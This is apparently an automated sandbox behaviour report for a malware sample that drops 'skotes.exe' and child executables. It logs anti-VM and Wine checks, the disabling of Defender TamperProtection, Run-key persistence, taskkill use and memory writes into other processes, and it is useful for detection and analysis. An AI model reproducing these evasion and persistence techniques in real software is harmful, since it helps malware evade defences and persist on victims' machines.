Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\834d52b622.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012619001\\834d52b622.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\24b798a9da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012620001\\24b798a9da.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4d29df7d32.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012621001\\4d29df7d32.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c931428444.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012622001\\c931428444.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1388 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1388 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1388 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 4396 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe
PID 4396 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe
PID 4396 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012618001\3a3df0a5b6.exe
PID 4396 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe
PID 4396 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe
PID 4396 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012619001\834d52b622.exe
PID 4396 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe
PID 4396 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe
PID 4396 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012620001\24b798a9da.exe
PID 4396 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe
PID 4396 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe
PID 4396 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe
PID 4660 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Windows\SysWOW64\taskkill.exe
PID 4660 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4660 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\1012621001\4d29df7d32.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1528 wrote to memory of 2024 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2024 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
